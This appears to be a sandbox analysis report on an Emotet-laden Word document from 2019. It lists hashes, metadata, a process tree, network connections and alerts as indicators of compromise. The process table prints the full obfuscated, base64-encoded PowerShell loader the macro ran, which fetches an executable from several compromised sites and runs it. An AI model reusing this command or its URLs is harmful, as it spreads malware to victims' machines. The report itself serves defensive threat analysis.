File name: | 20190918 5663473.doc |
Full analysis: | https://app.any.run/tasks/985fa465-a544-4973-91c7-e55248a0d5f0 |
Verdict: | Malicious activity |
Threats: | Emotet is one of the most dangerous trojans ever created. Over the course of its lifetime, it was upgraded to become a very destructive malware. It targets mostly corporate victims but even private users get infected in mass spam email campaigns. |
Analysis date: | October 14, 2019, 13:00:52 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Tags: | |
MIME: | application/msword |
File info: | Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.1, Code page: 1252, Title: grow Jewelery payment, Subject: front-end, Author: Abbigail Doyle, Comments: channels, Template: Normal.dotm, Revision Number: 1, Name of Creating Application: Microsoft Office Word, Create Time/Date: Wed Sep 18 15:38:00 2019, Last Saved Time/Date: Wed Sep 18 15:38:00 2019, Number of Pages: 1, Number of Words: 95, Number of Characters: 547, Security: 0 |
MD5: | 2DDD7A9AA53C0E243BA81E897A3CDAAB |
SHA1: | FF41649E2DD3083DE76519E372A654F49454389B |
SHA256: | D05CCB541D988789BBEE894553D74418F0531FD2FC685F0D96367A0230DA197C |
SSDEEP: | 6144:TRyxNRIIt1POT3XtwNJ6mdtPLkIZ7NSU4jJntATfD9GPy4XSKD:TRyxNRIIt1POT3XtwNJ6mdtXZ7NSU4Vj |
.doc | | | Microsoft Word document (54.2) |
---|---|---|
.doc | | | Microsoft Word document (old ver.) (32.2) |
CompObjUserType: | Microsoft Word 97-2003 Document |
---|---|
CompObjUserTypeLen: | 32 |
Manager: | Medhurst |
HeadingPairs: |
|
TitleOfParts: | - |
HyperlinksChanged: | No |
SharedDoc: | No |
LinksUpToDate: | No |
ScaleCrop: | No |
AppVersion: | 16 |
CharCountWithSpaces: | 641 |
Paragraphs: | 1 |
Lines: | 4 |
Company: | Schowalter, Baumbach and Buckridge |
CodePage: | Windows Latin 1 (Western European) |
Security: | None |
Characters: | 547 |
Words: | 95 |
Pages: | 1 |
ModifyDate: | 2019:09:18 14:38:00 |
CreateDate: | 2019:09:18 14:38:00 |
TotalEditTime: | - |
Software: | Microsoft Office Word |
RevisionNumber: | 1 |
LastModifiedBy: | - |
Template: | Normal.dotm |
Comments: | channels |
Keywords: | - |
Author: | Abbigail Doyle |
Subject: | front-end |
Title: | grow Jewelery payment |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1608 | "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\20190918 5663473.doc" | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | — | explorer.exe |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft Word Version: 14.0.6024.1000 | ||||
4040 | powershell -encod JAB6AEcASgA0AG4ASgA9ACcAbAB2ADMAdwBLADkAMQA3ACcAOwAkAEwASgB1AEYAcgAzACAAPQAgACcAOAAzADUAJwA7ACQAVQBQAEsAcgB3AGEAUAA9ACcAcQBiAG8AYwBPAFMAQwAnADsAJAByAHIANQBLAFIAdQB3ADEAPQAkAGUAbgB2ADoAdQBzAGUAcgBwAHIAbwBmAGkAbABlACsAJwBcACcAKwAkAEwASgB1AEYAcgAzACsAJwAuAGUAeABlACcAOwAkAHoARQB1AEQAaQBCAEIAMAA9ACcATgBVAHoAUABvAGIAQgBCACcAOwAkAFgAdABfAE0AdwBxAD0AJgAoACcAbgBlAHcAJwArACcALQBvAGIAagAnACsAJwBlAGMAdAAnACkAIABOAEUAdAAuAHcARQBiAGMATABJAGUATgB0ADsAJABkAGoANgBkAG0AcgA9ACcAaAB0AHQAcAA6AC8ALwB0AGgAaQBuAGgAdgB1AG8AbgBnAG0AZQBkAGkAYQAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AbgAyAGsAZQBlAHAANwAvAEAAaAB0AHQAcABzADoALwAvAG0AbgBwAGEAcwBhAGwAdQBiAG8AbgBnAC4AYwBvAG0ALwB3AHAALQBhAGQAbQBpAG4ALwBuAHMAbQB6ADkAYQB6ADAAMwAyAC8AQABoAHQAdABwADoALwAvAHQAcgB1AG4AZwBhAG4AaAAuAHgAeQB6AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHUAegBxADUAMAAvAEAAaAB0AHQAcABzADoALwAvAGkAcAB0AGkAdgBpAGMAaQBuAGkALgBjAG8AbQAvAG4AcABrAHgALwBqAHcAcAB5ADkAMwA4AC8AQABoAHQAdABwAHMAOgAvAC8AdwB3AHcALgBjAGUAegBhAGUAdgBpAG4AZQBnAG8AbgBkAGUAcgAuAGMAbwBtAC8AYwBvAG4AZgAvAGYAZAA0ADUALwAnAC4AIgBTAHAAbABgAEkAVAAiACgAJwBAACcAKQA7ACQAVABkAFgAbgBpADAAUgA9ACcAZAA0ADcAaQBNADQAMAAnADsAZgBvAHIAZQBhAGMAaAAoACQAbwBqAGoAVQBUAG8AagBCACAAaQBuACAAJABkAGoANgBkAG0AcgApAHsAdAByAHkAewAkAFgAdABfAE0AdwBxAC4AIgBkAG8AdwBOAEwAYABPAEEAYABEAGYAYABpAEwARQAiACgAJABvAGoAagBVAFQAbwBqAEIALAAgACQAcgByADUASwBSAHUAdwAxACkAOwAkAG4ASgBxAHcAOABYAFEAPQAnAEoAQQBBAE4AUQBPADMAVwAnADsASQBmACAAKAAoACYAKAAnAEcAZQAnACsAJwB0AC0ASQB0AGUAJwArACcAbQAnACkAIAAkAHIAcgA1AEsAUgB1AHcAMQApAC4AIgBMAGUAbgBHAGAAVABoACIAIAAtAGcAZQAgADIAOQA4ADAANAApACAAewBbAEQAaQBhAGcAbgBvAHMAdABpAGMAcwAuAFAAcgBvAGMAZQBzAHMAXQA6ADoAIgBTAFQAYABBAHIAVAAiACgAJAByAHIANQBLAFIAdQB3ADEAKQA7ACQAZABmAHYANQBqADUAPQAnAG8AbgBYAHAAdgBxACcAOwBiAHIAZQBhAGsAOwAkAGwAagBqAEEAWABMADAAPQAnAFUAVwBtAHIAcgAxACcAfQB9AGMAYQB0AGMAaAB7AH0AfQAkAGkAdwBRAFkAdwBQAD0AJwB3AGgAWAB6AFYAUABpACcA | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | wmiprvse.exe | |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\CVRA860.tmp.cvr | — | |
MD5:— | SHA256:— | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\5CD937F.wmf | wmf | |
MD5:FB035DDD00FF4E67418FE946AF433D8F | SHA256:43E65387BF0030BE86A051C7F3175CACB7EDE7246644EE731B366F0C100F1F8A | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotm | pgc | |
MD5:D3E45E9E34C71A48C10FD945E9620BAF | SHA256:6CC7603DD408465CD9F4E0ED479443E49C34BDBCC43DE9FD1A9A1A1B8185537F | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\BE29F13B.wmf | wmf | |
MD5:D6DC75921E19E6EDF49D1A5401A13BA9 | SHA256:5CD080CA355978C64BB72E025FF9957838AAE72A6F621C2FDA558923CA486E69 | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\45F81ED.wmf | wmf | |
MD5:A763620D19A28297B3F1444F1164532A | SHA256:5E623AF25F12E061002A01B88C300C371C699FB1A84FA859FC26C2AECA370A0B | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4CA7AF4C.wmf | wmf | |
MD5:BE149EF4A7E4875DEC9B4B8A8E52D0B0 | SHA256:1CE8F318DCD9AEE95851428924D17C982219B3BD2EB9CE0DAC1C93076BDDBF97 | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\AE62DA01.wmf | wmf | |
MD5:46FB50CA170F2E87FFEC77D5D775C1A4 | SHA256:136F13603BC289494B5A8413AF5E1D97E7A7C71BD45A7F1D7AAB619A4DDD0E23 | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6D90A3A8.wmf | wmf | |
MD5:01919F45764FBE382D9043FFC1338F7E | SHA256:6EA3DDC3B7200A1BA4911EB219A50AEB1A5182D599197B30AB87339FEB291D88 | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\629968E5.wmf | wmf | |
MD5:CE48C49704878C2D4274519AB0E1A2CF | SHA256:9B1F412ACB0CC7C8EE3B8267CE60A9635530AC51E526BA5EC95346555109FA22 | |||
1608 | WINWORD.EXE | C:\Users\admin\AppData\Local\Temp\Word8.0\MSForms.exd | tlb | |
MD5:BCF6251EF863CAA9BC03B97A0E613B53 | SHA256:9A289D56A0B1222FA37C5C1D0A636CBB0DA8D202598DF03782EE8E183DEAE197 |
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
---|---|---|---|---|---|---|---|---|---|
4040 | powershell.exe | GET | — | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | — | — | suspicious |
4040 | powershell.exe | GET | 301 | 104.28.5.162:80 | http://trunganh.xyz/wp-content/uzq50/ | US | — | — | suspicious |
4040 | powershell.exe | GET | — | 124.158.6.218:80 | http://thinhvuongmedia.com/wp-admin/n2keep7/ | VN | — | — | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
---|---|---|---|---|---|---|
4040 | powershell.exe | 124.158.6.218:80 | thinhvuongmedia.com | CMC Telecommunications Services Company | VN | suspicious |
4040 | powershell.exe | 104.28.5.162:80 | trunganh.xyz | Cloudflare Inc | US | shared |
4040 | powershell.exe | 31.210.70.130:443 | iptivicini.com | Radore Veri Merkezi Hizmetleri A.S. | TR | unknown |
4040 | powershell.exe | 104.27.132.144:443 | mnpasalubong.com | Cloudflare Inc | US | shared |
4040 | powershell.exe | 212.47.241.236:443 | www.cezaevinegonder.com | Online S.a.s. | FR | unknown |
4040 | powershell.exe | 104.28.5.162:443 | trunganh.xyz | Cloudflare Inc | US | shared |
Domain | IP | Reputation |
---|---|---|
thinhvuongmedia.com |
| suspicious |
mnpasalubong.com |
| unknown |
trunganh.xyz |
| suspicious |
iptivicini.com |
| unknown |
www.cezaevinegonder.com |
| unknown |
PID | Process | Class | Message |
---|---|---|---|
4040 | powershell.exe | Potentially Bad Traffic | AV INFO HTTP Request to a *.xyz domain |